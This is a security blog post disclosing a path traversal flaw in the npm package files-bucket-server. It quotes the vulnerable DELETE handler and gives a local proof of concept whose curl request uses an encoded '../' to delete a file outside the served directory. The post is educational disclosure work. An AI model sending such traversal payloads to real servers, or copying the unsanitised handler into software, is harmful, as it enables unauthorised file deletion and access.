Hey folks, heads up! I recently dug into a gnarly path traversal vulnerability in a popular npm package called files-bucket-server. This one’s a doozy, so buckle up and let’s dissect it.

What’s files-bucket-server?

The [files-bucket-server]() npm package acts as a mini file server. It lets you programmatically serve files from local directories, making it super convenient for specific use cases. Not terribly popular at 1 weekly download, but hey, it’s out there and there’s a bunch of security learning we can benefit from this.

The package offers two main ways to interact with files:

• Web Server: This spins up a web server that serves files from a designated directory as static assets.
• RESTful API: This provides an API for accessing and deleting files programmatically.

Now, the catch…

The Insecure Code That Leads to Path Traversal

Can you spot the API security, or shall I say, API insecurity, in the following code snippet:

        self.server.app.delete('/api/files/:filename', function (req, res) {
            var filePath = path.join(self.workspacePath, req.params.filename);
            try {
                if (!fs.existsSync(filePath)) {
                    res.status(404);
                    res.send('Not found');
                    res.end();
                    return;
                }
                fse.removeSync(filePath);
                res.status(200);
                res.send('Deleted!');
                res.end();
            } catch (err) {
                res.status(500);
                res.send(err);
                res.end();
            }
        });

The Vulnerability: Sneaking Through Directories

The vulnerability lies in the way files-bucket-server handles file deletion via the API. It turns out the package doesn’t properly sanitize user-provided file paths. This means a malicious actor could craft a specially encoded path that escapes the intended directory and traverses the filesystem, potentially accessing sensitive files.

Here’s the gist: imagine the package expects a file named image.jpg within your designated directory. An attacker could send a request to delete something like ../../../../secret_data.txt instead. By cleverly using ../ characters (think “go up one directory level”), they could potentially access your secret data file even though it’s outside the intended directory.

What sort of API payload can we send to the DELETE file route to exploit this vulnerability?

FAQ: Path Traversal Explained

Question: What’s path traversal?

Answer: Path traversal is a vulnerability that allows attackers to access files or directories outside of the intended location. They achieve this by manipulating the path used by the application to access files.

Question: How does sanitization help to prevent Path Traversal?

Answer: Sanitization involves cleaning user-provided input to remove harmful characters or code. In this case, sanitizing the path would prevent attackers from injecting ../ characters and escaping the intended directory. That said, the correct security control would be to construct a path in a secure way that results in a canonical path that is within the intended directory.

Vulnerable Versions and Proof of Concept (PoC)

Bad news: All versions of files-bucket-server, up to and including version 1.2.6, are vulnerable.

The good news? I’ve included a PoC (Proof of Concept) in the code snippet below. This demonstrates how an attacker could exploit the vulnerability. Please note: This is for educational purposes only! Don’t go poking holes in your production systems, or others.

Path Traversal Proof of Concept

1. Install the files-bucket-server package:

npm install files-bucket-server

2. Create a new directory:

3. Add a file to the directory and also create a file outside in the root directory:

echo "This is a generic file, hello world" > private-files/hello.txt
echo "This is a secret file" > secret.txt

4. Define a server.js file with the programmatic API of files-bucket-server that also restricts access to a specific directory (yet fails to do so):

var FileBucketServer = require('files-bucket-server');
var fBServer = new FileBucketServer('./private-files', { logsEnabled: true });
// Only allow local requests
fBServer.onlyAllowLocalRequests();
// Start server
fBServer.start().then(function (serverData) {
  console.log('Server is up at port: '+serverData.port);
});

5. Run the server

6. Access a file inside the directory to ensure everything is working as expected:

curl "http://localhost:1024/files/hello.txt"

7. Now, attempt to delete a file outside this directory using the RESTful API:

curl -X DELETE "http://localhost:1024/api/files/%2e%2e%2fsecret.txt"

8. The file secret.txt will be deleted, proving the path traversal vulnerability.

Staying Safe: Patch Early, Patch Often

The fix for this vulnerability is simple: upgrade to the latest version of files-bucket-server once it’s patched!. Will it be patched, though? How old is this library? That’s one of the tricky parts about relying on open-source dependencies.

In the meantime, be extra cautious about user-provided file paths and consider implementing additional security measures on your server-side code.

Remember: Responsible disclosure is key! Let’s keep the web a safer place for everyone.

Stay tuned for more security adventures!